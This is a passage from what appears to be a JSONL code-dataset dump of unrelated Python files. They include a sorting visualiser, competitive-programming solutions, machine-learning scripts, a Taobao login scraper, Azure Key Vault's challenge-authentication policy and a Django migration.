mark2, self.YELLOW)\n if mark1:\n self.Mark(img, mark1, self.RED) # 长的置为红色并向后移动\n\n img = cv2.resize(img, (self.im_size, self.im_size))\n\n self.time = self.gt.get_time()\n cv2.putText(img, \"{} Time: {:.2f}s\".format(self.sort_title, self.time)\n ,(20, 20), cv2.FONT_HERSHEY_PLAIN, 1, self.YELLOW, 1)\n \n cv2.imshow(self.sort_title , img)\n \"\"\"\n waitKey的功能是不断刷新图像,时间频率为delay ,单位ms \n 返回值为当前键盘按键值 \n 1- 是在一个给定的时间内(单位ms)等待用户按键触发\n 如果用户没有按下键盘,则接着等待(循环)\n waitKey(0) 表示程序无线等待用户的按键事件\n 一般在imgshow的时候,如果设置waitKey(0),代表按任意键继续\n 2- 显示视频时,延迟时间需要设置为 大于0的参数\n \"\"\"\n cv2.waitKey(self.time_interval)\n\n ## 排序余姚用到的位置处理函数\n def swap(self, idx1, idx2):\n \"\"\"\n 交换 idx1, idx2 的值\n 并画刷新图 \n \"\"\"\n self.data[idx1], self.data[idx2] = self.data[idx2], self.data[idx1]\n # 交换位置 重新设置(交换位置后)条形图的高和颜色\n self._set_figure(idx1, self.data[idx1])\n self._set_figure(idx2, self.data[idx2])\n self.Visualize((idx1, idx2))\n\n def set_val(self, idx, val):\n \"\"\"\n :param: idx 位置 \n :param: val 值 \n data[idx] = val \n \"\"\"\n self.data[idx] = val \n self._set_figure(idx, val)\n self.Visualize((idx,))\n","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"569600039","text":"def isi98_python(M, nTries):\n n = len(M[0])\n\n\n\n\n\n\ndef fun(M):\n n = len(M[0])\n result = [0,0]\n k = M[:]\n counter = 0\n for i in range(1,n):\n temp = k[i][0:i]\n part_counter = len([x for x in temp if x >0])\n counter = part_counter + counter\n\n\n","sub_path":"inst/isi98.py","file_name":"isi98.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"158213821","text":"#Enter the number of test cases\r\nt = int(input())\r\nwhile t > 0:\r\n #Enter the size of the array\r\n n = int(input())\r\n #Enter the space separated integers\r\n arr = [int(i) for 
i in input().split()]\r\n for i in range(n):\r\n s = 0\r\n for j in range(n):\r\n if i != j:\r\n s = s + arr[j]\r\n print(s, end=\" \")\r\n t = t - 1\r\n","sub_path":"Sum of Array Problem/Sum_of_Array_Puzzle.py","file_name":"Sum_of_Array_Puzzle.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"45524859","text":"#!/usr/bin/python\nimport sys\nimport numpy as np\nfrom analysis.prd_score import compute_prd, compute_prd_from_embedding, _prd_to_f_beta\nfrom prd import plot_pr_aucs,calc_pr_rec\nfrom sklearn.metrics import auc\nfrom generator import ModelGConvTranspose\nfrom Regressor import Regressor,load_embedder\nfrom tqdm import tqdm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as utils\nimport matplotlib.pyplot as plt\nimport os\n\nNOISEIMAGE_DIM=10\nNOISE_DIM=NOISEIMAGE_DIM**2\nEnergyDepositScale = torch.tensor([4000]).float()\nMomentumScale = torch.tensor([30,30,100]).float()\nPointScale = torch.tensor([10,10]).float()\nPDGScale = torch.tensor([11]).float()\nMomentumPointPDGScale = torch.cat([MomentumScale,PointScale,PDGScale])\n\ndef main():\n input_dir, output_dir = sys.argv[1:]\n embedder = load_embedder('./analysis/embedder.tp')\n \n # data_val = np.load(input_dir + '/data_val.npz', allow_pickle=True)\n # val_data_path_out = output_dir + '/data_val_prediction.npz'\n # \n # data_test = np.load(input_dir + '/data_test.npz', allow_pickle=True)\n # test_data_path_out = output_dir + '/data_test_prediction.npz'\n \n data_train = np.load(input_dir + '/data_train.npz', allow_pickle=True)\n # test_data_path_out = output_dir + '/data_test_prediction.npz'\n \n generator_cpu = ModelGConvTranspose(z_dim=NOISEIMAGE_DIM, MomentumPointPDGScale = MomentumPointPDGScale,EnergyScale = EnergyDepositScale)\n # generator_cpu.load_state_dict(torch.load(os.path.dirname(os.path.abspath(__file__)) + '/gan_80.pt'))\n generator_cpu.load_state_dict(torch.load(os.path.dirname(os.path.abspath(__file__)) + '/gan_20.pt'))\n # generator_cpu.eval()\n \n # val\n data_size = 250\n EnergyDeposit_train = torch.tensor(data_train['EnergyDeposit'][:data_size].reshape(-1,1,30,30)).float()\n ParticleMomentum_train = torch.tensor(data_train['ParticleMomentum'][:data_size]).float()\n ParticlePoint_train = torch.tensor(data_train['ParticlePoint'][:data_size, :2]).float()\n ParticlePDG_train = torch.tensor(data_train['ParticlePDG'][:data_size].reshape(-1,1)).float()\n ParticleMomentum_ParticlePoint_ParticlePDG_train = torch.cat([ParticleMomentum_train, ParticlePoint_train, ParticlePDG_train], dim=1)\n calo_dataset_train = utils.TensorDataset(EnergyDeposit_train,ParticleMomentum_ParticlePoint_ParticlePDG_train)\n calo_dataloader_train = torch.utils.data.DataLoader(calo_dataset_train, batch_size=data_size, shuffle=False)\n\n with torch.no_grad():\n EnergyDeposit_train = []\n EnergyDeposit_train_truth = []\n for EnergyDeposit_train_batch,ParticleMomentum_ParticlePoint_ParticlePDG_train_batch in tqdm(calo_dataloader_train):\n noise = torch.randn(ParticleMomentum_ParticlePoint_ParticlePDG_train_batch.shape[0], NOISE_DIM)\n # print(ParticleMomentum_ParticlePoint_ParticlePDG_train_batch.shape)\n EnergyDeposit_train_gen_batch = generator_cpu(noise, ParticleMomentum_ParticlePoint_ParticlePDG_train_batch)\n EnergyDeposit_train.append(EnergyDeposit_train_gen_batch)\n data_real = embedder.get_encoding(torch.tensor(EnergyDeposit_train_batch).float().view(-1, 1, 30, 
30)).detach().numpy()\n data_fake = embedder.get_encoding(torch.tensor(EnergyDeposit_train_gen_batch).float().view(-1, 1, 30, 30)).detach().numpy()\n precisions, recalls = calc_pr_rec(data_real, data_fake, num_clusters=100, num_runs=20)\n pr_aucs = plot_pr_aucs(precisions, recalls)\n plt.title('Num_clusters={}, num_runs={}, first third'.format(100, 20))\n plt.show()\n\n return 0\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"448420782","text":"\nclass UnionFind:\n def __init__(self, n :int):\n self.d = [-1] * n\n\n def find(self, x :int) -> int:\n if self.d[x] < 0: return x\n return self.find(self.d[x])\n \n def unite(self, x, y :int):\n xr, yr = self.find(x), self.find(y)\n if xr == yr:\n return\n\n if -self.d[xr] < -self.d[yr]:\n xr, yr = yr, xr\n\n self.d[xr] += self.d[yr]\n self.d[yr] = xr\n\n def is_same(self, x, y :int) -> bool:\n return self.find(x) == self.find(y)\n\n def size(self, x :int) -> int:\n return - self.d[self.find(x)]\n\n\ndef main():\n n, m = map(int, input().split())\n ab = [list(map(int, input().split())) for _ in range(m)]\n ab = [[a-1, b-1] for a, b in ab]\n\n uf = UnionFind(n)\n\n for a, b in ab:\n uf.unite(a, b)\n\n mx = 0\n for i in range(n):\n s = uf.size(i)\n if s > mx:\n mx = s\n\n print(mx)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"Python_codes/p02573/s512175265.py","file_name":"s512175265.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"432823900","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[98]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sn\n\n\n# In[99]:\n\n\ndata=pd.read_csv('D:DS_TriS/Advertising.csv')\ndata.head()\n\n\n# In[121]:\n\n\ndata1=data.drop(['Unnamed: 0'],1)\ndata1.head()\n\n\n# In[122]:\n\n\ncorr=data1.corr()\ncorr.nlargest(4,['sales'])['sales']\n\n\n# In[123]:\n\n\nX=data1.drop(['sales'],1)\nX.head()\n\n\n# In[124]:\n\n\nfrom sklearn.preprocessing import StandardScaler\n\n\n# In[125]:\n\n\nsc=StandardScaler()\nX2=sc.fit_transform(X)\nX2\n\n\n# In[126]:\n\n\ny=data1['sales'].values\ny\n\n\n# In[127]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[128]:\n\n\nX_train,X_test,y_train,y_test=train_test_split(X2,y,test_size=0.3,random_state=1)\n\n\n# In[129]:\n\n\nfrom sklearn.linear_model import LinearRegression\n\n\n# In[130]:\n\n\nmodel=LinearRegression(normalize=True)\nmodel.fit(X_train,y_train)\n\n\n# In[131]:\n\n\nmodel.coef_\n\n\n# In[132]:\n\n\nmodel.intercept_\n\n\n# In[133]:\n\n\ny_pred=model.predict(X_test)\ny_pred\n\n\n# In[134]:\n\n\ny_test\n\n\n# In[135]:\n\n\na=pd.DataFrame({'actual':y_test,'predicted':y_pred})\na.head(10)\n\n\n# In[136]:\n\n\nfrom sklearn.metrics import r2_score\n\n\n# In[137]:\n\n\nr2_score(y_test,y_pred)\n\n\n# In[138]:\n\n\nmodel.score(X_train,y_train)\n\n\n# In[142]:\n\n\na=data1.iloc[100:105,:-1]\na\n\n\n# In[143]:\n\n\na=sc.fit_transform(a)\na\n\n\n# In[144]:\n\n\nmodel.predict(a)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"MLR_Advertisem.py","file_name":"MLR_Advertisem.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"317595414","text":"def read_number(f):\r\n return int(f.readline().strip())\r\n\r\n\r\ndef 
compute(people_count):\r\n people_necessary = 0\r\n count = 0\r\n\r\n for shyness_level, people in enumerate(people_count):\r\n if count < shyness_level:\r\n people_necessary += shyness_level - count\r\n count = shyness_level\r\n count += people\r\n\r\n return people_necessary\r\n\r\n\r\n\r\ndef main():\r\n with open('A-small-attempt0.in', 'r') as f:\r\n test_cases = read_number(f)\r\n\r\n for test_case in range(test_cases):\r\n most_shy, numbers = f.readline().split()\r\n print('Case #{}: {}'.format(test_case + 1, compute(list(map(int, numbers)))))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"solutions_5639104758808576_0/Python/Jakube/problemA.py","file_name":"problemA.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"484545281","text":"'''\nCreated on Nov 25, 2013\n\n@author: noampeled\n'''\n\nfrom src.commons.analyzer.analyzer import Analyzer\nfrom src.commons.analyzer.analyzerTimeSelector import AnalyzerTimeSelector\nfrom src.commons.utils import utils\nimport os\nimport numpy as np\n\n\nclass AnalyzerYoni(AnalyzerTimeSelector):\n PROCS_NAMES = ['1Or2', '2or4', '1Or4']\n PROC_1_2, PROC_2_4, PROC_1_4 = range(3)\n LABELS = [['1', '2'], ['2', '4'], ['1', '4']]\n\n def __init__(self, *args, **kwargs):\n kwargs['indetifier'] = 'yoni'\n super(AnalyzerYoni, self).__init__(*args, **kwargs)\n\n def loadData(self):\n matlabFullPath = os.path.join(self.folder, self.matlabFile)\n matlabDic = utils.loadMatlab(matlabFullPath)\n return matlabDic\n\n def getTrialsTimeLength(self, matlabDic):\n return matlabDic['x'].shape[1]\n\n def dataGenerator(self, matlabDic):\n X, Y = matlabDic['x'], matlabDic['y'][0]\n nanidx = np.where(np.isnan(X[0]))[0]\n self.xAxis = np.delete(self.xAxis, nanidx, axis=0)\n for x, y in zip(X, Y):\n x = np.delete(x, nanidx, axis=0)\n x = np.reshape(x, (x.shape[0], 1))\n yield ((x, y), {})\n\n def getTrialShape(self, matlabDic):\n x = matlabDic['x'][0]\n nanidx = np.where(np.isnan(x))[0]\n T = x.shape[0] - len(nanidx)\n return (T, 1) # Only one channel\n\n def metaDataGenerator(self, matlabDic):\n labels = matlabDic['y'][0]\n for label in labels:\n yield (label, {})\n\n def trialCond(self, label, trialInfo):\n flag = False\n if (self.procID == self.PROC_1_2):\n flag = (label in [1, 2])\n elif (self.procID == self.PROC_1_4):\n flag = (label in [1, 4])\n elif (self.procID == self.PROC_2_4):\n flag = (label in [2, 4])\n else:\n utils.throwException('wrong procID!')\n return flag\n\n def trialLabel(self, label, trialInfo):\n if (self.procID == self.PROC_1_2):\n y = 0 if label == 1 else 1\n elif (self.procID == self.PROC_1_4):\n y = 0 if label == 1 else 1\n elif (self.procID == self.PROC_2_4):\n y = 0 if label == 2 else 1\n else:\n utils.throwException('wrong procID!')\n return y\n\n def weightsFullFileName(self, samWeights):\n return os.path.join(self.folder, self.subject, samWeights)\n\n @property\n def weightsDicKey(self):\n return 'ActWgtsNoZeros'\n\n\n","sub_path":"src/yoni/analyzerYoni.py","file_name":"analyzerYoni.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"147970221","text":"\"\"\"\nSujet :\n\nExercice 1 :\nAfficher les nombres impairs de 7 à 13 avec une boucle.\n\nExercice 2 :\nDéfinir une liste contenant les chiffres romains de 1 à 10. 
Afficher l’élément III.\n\nExercice 3 :\nDéfinir un dictionnaire qui associe à chaque jour de la semaine, s’il fait partie du week-end ou non. En utilisant ce dictionnaire, déterminer si jeudi fait partie du week-end.\n\nExercice 4 :\nTélécharger la page www.wikipedia.fr. Afficher le message “erreur du serveur” si le code d’erreur est supérieur ou égal à 500.\n\n\"\"\"\n\n# Exercice 1\n\nfor compteur in range(7, 14):\n    if compteur % 2 == 1:\n        print(compteur)\n\nfor compteur in range(7, 14, 2):\n    print(compteur)\n\n# Exercice 2\n\nliste_nombres = [\n    'I', 'II', 'III', 'IV', 'V',\n    'VI', 'VII', 'VIII', 'IX', 'X',\n]\n\nprint(liste_nombres[2])\n\n# Exercice 3\n\nfait_partie_du_week_end = {\n    'lundi': False,\n    'mardi': False,\n    'mercredi': False,\n    'jeudi': False,\n    'vendredi': False,\n    'samedi': True,\n    'dimanche': True,\n}\n\nif fait_partie_du_week_end['jeudi']:\n    print('Jeudi est un jour du week-end')\nelse:\n    print(\"Jeudi n'est pas un jour du week-end\")\n\n# Exercice 4\n\nimport requests\n\nreponse = requests.get('https://www.wikipedia.fr')\n\nif reponse.status_code >= 500:\n    print('erreur du serveur')\n","sub_path":"correction.py","file_name":"correction.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"511365668","text":"import sys\nimport re\nimport unittest\n\nclass pseudoTest(unittest.TestCase):\n    def test_dummy(self):\n        self.assertTrue(1)\n\ndef do_edit(filename, filter=None):\n    with open(filename, \"r\") as f:\n        lines = f.readlines()\n    with open(filename, \"w\") as f:\n        for line in lines:\n            if filter is not None and not filter.match(line):\n                f.write(line)\n\nif __name__ == \"__main__\":\n    # delete all lines containing the word \"delete\"\n    filter = re.compile(r\".*\\bdelete\\b\")\n    for name in sys.argv[1:]:\n        do_edit(name, filter=filter)\n","sub_path":"tests/pseudoedit.py","file_name":"pseudoedit.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"494995583","text":"import json\n\nimport requests\n\nfrom setting import INVOICE_URL, PIASTIX_URL\n\n\nclass RequestManager:\n    @staticmethod\n    def send_request(data):\n        if \"shop_currency\" in data:\n            r = requests.post(url=PIASTIX_URL, data=json.dumps(data), headers={'content-type': 'application/json'})\n            result = r.text\n        elif data['currency'] == '643':\n            r = requests.post(url=INVOICE_URL, data=json.dumps(data), headers={'content-type': 'application/json'})\n            result = r.json()\n            if result['error_code'] == 0:\n                return result['data']['url']\n            return '/'\n        else:\n            return '/'\n        return '/'","sub_path":"app/Managers/RequestManager.py","file_name":"RequestManager.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"207673692","text":"def divide_by_three(list_of_pairs):\n    for_features = {}\n    test = {}\n    train = {}\n    destinations = [for_features, test, train]\n    while len(list_of_pairs) > 2 or len(list_of_pairs) % 3 == 0:\n        #grab a random id from big_genre and remove\n        for m, l in enumerate(destinations):\n\n            candidates = list(list_of_pairs.keys())\n            shuffle(candidates)\n            key = candidates[0]\n            #print(key)\n            candidate = list_of_pairs[key]\n            #remove from dictionary\n            del list_of_pairs[key]\n            #make sure the author is not in the dict\n            if candidate not in l:\n                l[key] = candidate\n\n            else:\n                next_one = destinations[m+1]\n                #next list same id if author in dict\n                if 
candidate not in next_one:\n                    next_one[key] = candidate\n                else:\n                    next_one = destinations[m+2]\n                    if candidate not in next_one:\n                        next_one[key] = candidate\n    destinations_trimmed =[]\n    for i,j in enumerate(destinations):\n        aTuple = list(j.items())\n        shuffle(aTuple)\n        destinations_trimmed.append(dict(aTuple[:83]))\n    return destinations_trimmed\n\nfrom random import shuffle\nfrom application.selective_features import dictionaries_of_features, make_genres_big\nfrom application.pickles import pickledData\nimport pandas as pd\nfrom scipy.stats.stats import spearmanr\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.linear_model import LogisticRegression\nimport operator\n\npData = pickledData()\n\n# define as a function, supply a big_genre\ndef partition_features_test_train(big_genre, pData):\n    # Local variables.\n    _ids = pData._ids\n    dates = pData.dates\n    genres = pData.genres\n    #needs conversion\n    big_genres = make_genres_big(genres)\n    authors = pData.authors\n    feature_dicts = pData.feature_dicts\n\n    # get all ids for big_genre\n    big_genre_ids_and_author = {}\n    other_ids_and_author = {}\n    for i, j in enumerate(big_genres):\n        #print(i, _ids[i], j)\n        if j == big_genre:\n            big_genre_ids_and_author[_ids[i]] = authors[i]\n        else:\n            other_ids_and_author[_ids[i]] = authors[i]\n\n    # shuffle big_genre_tuples and \"deal out\" randomly like deck of cards into three, starting with author repeats\n    in_genre = divide_by_three(big_genre_ids_and_author)\n    # do same for other_ids\n    non_genre = divide_by_three(other_ids_and_author)\n    combined_partitions_ids = []\n    combined_partitions_binary_genres = []\n    for f,g in enumerate(in_genre):\n        combined = list(g.keys())+list(non_genre[f].keys())\n        shuffle(combined)\n        genre_processor = []\n        for i in combined:\n            if i in list(g.keys()):\n                genre_processor.append(1)\n            else:\n                genre_processor.append(0)\n        combined_partitions_binary_genres.append(genre_processor)\n        combined_partitions_ids.append(combined)\n    return combined_partitions_ids, combined_partitions_binary_genres\n\ncombined_partitions_ids, combined_partitions_binary_genres = partition_features_test_train(\"crime\", pData)\n\n#convert lists of ids into dictionaries of features in order of ids\n\n#the goal here is to end up with one list for feature_selection, one for testing, and one for training\nfeature_select_dicts = [pData.feature_dicts[d-1] for d in combined_partitions_ids[0]]\ntest_dicts = [pData.feature_dicts[d-1] for d in combined_partitions_ids[1]]\ntrain_dicts = [pData.feature_dicts[d-1] for d in combined_partitions_ids[2]]\n\nbinary_genres = combined_partitions_binary_genres[0]\n## Begin function block\n\n#convert to tf-idf model\ntfidf = TfidfTransformer()\nvec = DictVectorizer()\nvect = vec.fit_transform(feature_select_dicts)\nadjusted = tfidf.fit_transform(vect)\n\nterm_indices = list(vec.vocabulary_.items())\n#alphabetical order\nterm_indices.sort(key=operator.itemgetter(1))\n\nterm_list = [i[0] for i in term_indices]\ndata = adjusted.toarray()\n\np_tuples = []\n\nfor column in data.T:\n    p, c = spearmanr(column, binary_genres)\n    f_tuple = (p,c)\n    p_tuples.append(f_tuple)\n\n# zip back together with term_list\n#print(len(term_list), len(p_tuples))\nfinal_tuples = list(zip(term_list, [i[0] for i in p_tuples], [i[1] for i in p_tuples]))\n\nprint(final_tuples)\n## end function block\n##\n##\n\n# build feature list using sorted p_tuples\nselected_feature_list = []\n\n# process test and train dicts to include only 
chosen features\n# result = dictionaries_of_features(feature_dicts, genre_features)\n\ntext_clf = Pipeline([('vect', DictVectorizer()), ('tfidf', TfidfTransformer()),('clf', LogisticRegression()),])\n","sub_path":"logistic_w_selective_features.py","file_name":"logistic_w_selective_features.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"293921646","text":"\"\"\"登录淘宝\"\"\"\nimport json\nimport re\nimport requests\n\nurl_login = \"https://login.taobao.com/member/login.jhtml?redirectURL=https%3A%2F%2Fwww.taobao.com%2F\"\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0',\n}\n\npost_data = {\n 'TPL_username': '13135767989', # 用户名\n 'TPL_password': '' # 密码\n}\n\n\ndef login():\n session = requests.session()\n response = session.post(url_login, data=post_data,headers=headers)\n print(response.request.headers)\n return response, session\n\n\ndef get_cart(session):\n \"\"\"读取购物车信息\"\"\"\n url_cart = \"https://cart.taobao.com/cart.htm?t=1525683137724\"\n response = session.get(url_cart, headers=headers)\n\n response = response.text\n result = re.search(r'firstData = (.*?);}catch', response)\n if result:\n result = result.groups()[0]\n data = json.loads(result)\n print(data[\"list\"])\n for item in data[\"list\"]:\n print(item['seller'])\n print(item['title'])\n print(\"=====\")\n\n\nif __name__ == '__main__':\n response, session = login()\n get_cart(session)\n","sub_path":"login_test/taobao.py","file_name":"taobao.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"377349039","text":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\n\"\"\"Policy implementing Key Vault's challenge authentication protocol.\n\nNormally the protocol is only used for the client's first service request, upon which:\n1. The challenge authentication policy sends a copy of the request, without authorization or content.\n2. Key Vault responds 401 with a header (the 'challenge') detailing how the client should authenticate such a request.\n3. The policy authenticates according to the challenge and sends the original request with authorization.\n\nThe policy caches the challenge and thus knows how to authenticate future requests. However, authentication\nrequirements can change. For example, a vault may move to a new tenant. In such a case the policy will attempt the\nprotocol again.\n\"\"\"\n\nimport time\nfrom typing import TYPE_CHECKING\nfrom urllib.parse import urlparse\n\nfrom azure.core.exceptions import ServiceRequestError\nfrom azure.core.pipeline import PipelineRequest\nfrom azure.core.pipeline.policies import BearerTokenCredentialPolicy\n\nfrom .http_challenge import HttpChallenge\nfrom . 
import http_challenge_cache as ChallengeCache\n\nif TYPE_CHECKING:\n from typing import Optional\n from azure.core.credentials import AccessToken, TokenCredential\n from azure.core.pipeline import PipelineResponse\n\n\ndef _enforce_tls(request: PipelineRequest) -> None:\n if not request.http_request.url.lower().startswith(\"https\"):\n raise ServiceRequestError(\n \"Bearer token authentication is not permitted for non-TLS protected (non-https) URLs.\"\n )\n\n\ndef _update_challenge(request: PipelineRequest, challenger: \"PipelineResponse\") -> HttpChallenge:\n \"\"\"Parse challenge from a challenge response, cache it, and return it.\n\n :param request: The pipeline request that prompted the challenge response.\n :type request: :class:`~azure.core.pipeline.PipelineRequest`\n :param challenger: The pipeline response containing the authentication challenge.\n :type challenger: :class:`~azure.core.pipeline.PipelineResponse`\n\n :returns: An HttpChallenge object representing the authentication challenge.\n :rtype: HttpChallenge\n \"\"\"\n\n challenge = HttpChallenge(\n request.http_request.url,\n challenger.http_response.headers.get(\"WWW-Authenticate\"),\n response_headers=challenger.http_response.headers,\n )\n ChallengeCache.set_challenge_for_url(request.http_request.url, challenge)\n return challenge\n\n\nclass ChallengeAuthPolicy(BearerTokenCredentialPolicy):\n \"\"\"Policy for handling HTTP authentication challenges.\n\n :param credential: An object which can provide an access token for the vault, such as a credential from\n :mod:`azure.identity`\n :type credential: :class:`~azure.core.credentials.TokenCredential`\n \"\"\"\n\n def __init__(self, credential: \"TokenCredential\", *scopes: str, **kwargs) -> None:\n super(ChallengeAuthPolicy, self).__init__(credential, *scopes, **kwargs)\n self._credential = credential\n self._token: \"Optional[AccessToken]\" = None\n self._verify_challenge_resource = kwargs.pop(\"verify_challenge_resource\", True)\n\n def on_request(self, request: PipelineRequest) -> None:\n _enforce_tls(request)\n challenge = ChallengeCache.get_challenge_for_url(request.http_request.url)\n if challenge:\n # Note that if the vault has moved to a new tenant since our last request for it, this request will fail.\n if self._need_new_token:\n # azure-identity credentials require an AADv2 scope but the challenge may specify an AADv1 resource\n scope = challenge.get_scope() or challenge.get_resource() + \"/.default\"\n self._token = self._credential.get_token(scope, tenant_id=challenge.tenant_id)\n\n # ignore mypy's warning -- although self._token is Optional, get_token raises when it fails to get a token\n request.http_request.headers[\"Authorization\"] = f\"Bearer {self._token.token}\" # type: ignore\n return\n\n # else: discover authentication information by eliciting a challenge from Key Vault. Remove any request data,\n # saving it for later. 
Key Vault will reject the request as unauthorized and respond with a challenge.\n # on_challenge will parse that challenge, reattach any body removed here, authorize the request, and tell\n # super to send it again.\n if request.http_request.body:\n request.context[\"key_vault_request_data\"] = request.http_request.body\n request.http_request.set_json_body(None)\n request.http_request.headers[\"Content-Length\"] = \"0\"\n\n def on_challenge(self, request: PipelineRequest, response: \"PipelineResponse\") -> bool:\n try:\n challenge = _update_challenge(request, response)\n # azure-identity credentials require an AADv2 scope but the challenge may specify an AADv1 resource\n scope = challenge.get_scope() or challenge.get_resource() + \"/.default\"\n except ValueError:\n return False\n\n if self._verify_challenge_resource:\n resource_domain = urlparse(scope).netloc\n if not resource_domain:\n raise ValueError(f\"The challenge contains invalid scope '{scope}'.\")\n\n request_domain = urlparse(request.http_request.url).netloc\n if not request_domain.lower().endswith(f\".{resource_domain.lower()}\"):\n raise ValueError(\n f\"The challenge resource '{resource_domain}' does not match the requested domain. Pass \"\n \"`verify_challenge_resource=False` to your client's constructor to disable this verification. \"\n \"See https://aka.ms/azsdk/blog/vault-uri for more information.\"\n )\n\n body = request.context.pop(\"key_vault_request_data\", None)\n request.http_request.set_text_body(body) # no-op when text is None\n\n # The tenant parsed from AD FS challenges is \"adfs\"; we don't actually need a tenant for AD FS authentication\n # For AD FS we skip cross-tenant authentication per https://github.com/Azure/azure-sdk-for-python/issues/28648\n if challenge.tenant_id and challenge.tenant_id.lower().endswith(\"adfs\"):\n self.authorize_request(request, scope)\n else:\n self.authorize_request(request, scope, tenant_id=challenge.tenant_id)\n\n return True\n\n @property\n def _need_new_token(self) -> bool:\n return not self._token or self._token.expires_on - time.time() < 300\n","sub_path":"sdk/keyvault/azure-keyvault-certificates/azure/keyvault/certificates/_shared/challenge_auth_policy.py","file_name":"challenge_auth_policy.py","file_ext":"py","file_size_in_byte":6655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"98549844","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('reporting', '0005_auto_20141004_0349'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ReportingCell',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateField()),\n ('value', models.IntegerField(default=0)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ReportingLine',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=40, verbose_name='nom')),\n ('unity', models.CharField(max_length=40, verbose_name='unity')),\n ('reporting', models.ForeignKey(to='reporting.Reporting')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='reportingcell',\n name='reporting_line',\n field=models.ForeignKey(to='reporting.ReportingLine'),\n preserve_default=True,\n ),\n migrations.RemoveField(\n 
model_name='reporting',\n name='data',\n ),\n ]\n","sub_path":"api/reporting/migrations/0006_auto_20141005_0841.py","file_name":"0006_auto_20141005_0841.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"120629974","text":"import torch\nimport torch.nn.functional as F\nfrom tqdm import tqdm\n\nfrom dice_loss import dice_coeff\n\ndef compute_overlaps_masks(masks1, masks2):\n '''\n masks1, masks2: [Height, Width, instances]\n this for binary mask\n '''\n \n # If either set of masks is empty return empty result\n if masks1.shape[0] == 0 or masks2.shape[0] == 0:\n return np.zeros((masks1.shape[0], masks2.shape[-1]))\n # flatten masks and compute their areas\n #masks1 = np.reshape(masks1 > .5, (-1, masks1.shape[-1])).astype(np.float32)\n #masks2 = np.reshape(masks2 > .5, (-1, masks2.shape[-1])).astype(np.float32)\n #area1 = np.sum(masks1, axis=0)\n #area2 = np.sum(masks2, axis=0)\n\n # intersections and union\n intersections = torch.sum(torch.mul(masks1, masks2)) #correct part\n union = torch.sum((masks1 + masks2)-torch.mul(masks1, masks2))\n \n if intersections ==0 or union==0:\n overlaps = 0\n else:\n overlaps = intersections / union\n\n return overlaps\n\ndef miou_loss(net, loader, device):\n \"\"\"Evaluation without the densecrf with the dice coefficient\"\"\"\n net.eval()\n mask_type = torch.float32 #if net.num_classes == 1 else torch.long\n n_val = len(loader) # the number of batch\n #batch_size = loader.batch_size \n tot = 0\n print('')\n with tqdm(total=n_val, desc='mIOU round', unit='batch', leave=False) as pbar:\n for batch in loader:\n imgs, true_masks = batch['image'], batch['mask']\n imgs = imgs.to(device=device, dtype=torch.float32)\n true_masks = true_masks.to(device=device, dtype=mask_type)\n\n with torch.no_grad():\n # SegNet\n # masks_pred, masks_softmax = 